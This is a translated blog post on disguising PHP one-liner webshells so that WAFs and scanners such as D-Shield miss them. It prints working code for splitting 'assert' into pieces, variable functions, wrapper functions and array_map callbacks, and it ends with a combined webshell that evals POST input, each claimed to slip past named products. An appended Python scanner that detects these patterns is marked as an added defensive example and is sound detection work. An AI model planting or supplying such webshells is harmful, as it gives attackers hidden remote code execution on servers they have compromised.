Original reproduced in: http://www.legendsec.org/1701.html
I think the writing is quite popular.
00x1. Keyword splitting.
For example, assert can be written as 'a'.'ss'.'e'.'r'.'t'.
Summary: Although this method is simple, it does not do much to evade detection on its own and needs to be combined with other methods.
00x2. Variable variables, references, variable functions.
Variable variables, such as $a = $_POST['x']; $b = 'a'; @eval($$b);
Test results:
Summary: This approach can bypass the dog and other WAFs, but it does not work against a multi-rule scanner such as D-Shield!
References, such as $a = $_POST['x']; $b = &$a; @eval($b);
Test results:
Summary: This approach is similar to the previous method.
Variable functions, such as $a = 'a'.'ss'.'e'.'r'.'t'; $a($_POST['x']);
Test results:
Summary: This method has no effect against the dog, 3 guards, D-Shield and so on.
00x3. Add additional code.
Add additional code, such as:
if (empty($a))
{
    $a = $_POST['x'];
}
@eval($a);
Test results:
Summary: This method is better suited to readers with a lot of imagination.
00x4. Function substitution.
Use a different function, for example replacing eval with assert.
Summary: This method is suitable for use when the eval function is disabled.
00x5. Encapsulation in a new function.
Define a new function and wrap the call inside it.
function test($a) { // define a function named test that accepts the argument in $a
    eval($a);
}
test($_POST['x']);
Test results:
Summary: This method is suitable for people with a PHP foundation. Flashy technique, nothing to be afraid of!
00x6. Function callback.
Use another function to make the call and execute it.
For example: array_map('a'.'s'.'se'.'r'.'t', array($_POST['x']));
Test Results:
Summary: This method is suitable for people with a PHP foundation. This method definitely gets past the WAF.
00x7. Combine the features of the various methods to write a one-liner that gets past a WAF.
<?php
function test($a) { // use the function encapsulation learned above
    if (empty($a)) { // use the additional-code technique learned above
        $a = "echo 'qq:xxxxxxx';"; // use this code to disrupt D-Shield's judgment
    }
    @eval($a);
}
@test($_POST['x']);
?>
Test Results:
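Seen from the detection side, every technique in 00x1 to 00x7 hides the direct sink(input) pattern but still leaves request input and a code sink, a variable call or a callback in the same file. The following Python scanner is an added example, not part of the original post or of any WAF's rule set: it folds split string literals back together and then correlates those signals. The rule names, function names and sample strings are constructed for illustration.

```python
import re

# Added example: all names here are this example's own, not any product's rules.
SINKS = {"eval", "assert", "system", "exec", "passthru", "shell_exec"}
CALLBACKS = {"array_map", "array_filter", "call_user_func", "call_user_func_array"}
SOURCE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
LIT = r"""(?:'[A-Za-z_]*'|"[A-Za-z_]*")"""
CONCAT = re.compile(LIT + r"(?:\s*\.\s*" + LIT + r")+")  # 'a'.'ss'.'e'.'r'.'t'

def fold_concat(src):
    """Collapse literal-only concatenations into a single quoted literal."""
    def join(m):
        return "'" + "".join(re.findall(r"[A-Za-z_]+", m.group(0))) + "'"
    return CONCAT.sub(join, src)

def scan(php):
    """Return the set of rule names that fire on one PHP source string."""
    code = fold_concat(php)
    hits = set()
    if not SOURCE.search(code):
        return hits  # no request input in the file, nothing to correlate
    lowered = code.lower()  # PHP function names are case-insensitive
    calls = set(re.findall(r"\b([a-z_0-9]+)\s*\(", lowered))
    literals = set(re.findall(r"['\"]([a-z_]+)['\"]", lowered))
    if calls & SINKS:
        hits.add("request-input+code-sink")      # 00x3, 00x5, 00x7
    if literals & SINKS:
        hits.add("sink-name-as-string")          # 00x1 after folding
        if calls & CALLBACKS:
            hits.add("callback-with-sink-name")  # 00x6
    if re.search(r"\$[A-Za-z_]\w*\s*\(", code):
        hits.add("variable-function-call")       # 00x2, $a(...)
    if re.search(r"\$\s*\$", code):
        hits.add("variable-variable")            # 00x2, $$b
    return hits

SAMPLES = {  # constructed inputs modelled on the snippets in this page
    "variable_variable": "<?php $a=$_POST['x']; $b='a'; @eval($$b);",
    "variable_function": "<?php $a='a'.'ss'.'e'.'r'.'t'; $a($_POST['x']);",
    "callback": "<?php array_map('a'.'s'.'se'.'r'.'t', array($_POST['x']));",
    "wrapped": "<?php function test($a){ if(empty($a)){ $a=\"echo 1;\"; }"
               " @eval($a); } @test($_POST['x']);",
    "benign": "<?php $name = htmlspecialchars($_POST['name']); echo 'Hello ' . $name;",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:18} {sorted(scan(src))}")
```

The rules are file-level heuristics, so a hit is a reason for manual review rather than a verdict.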
The END
PHP one-liners that get past the dog, Guardian, D-Shield and the like: ideas for evading detection!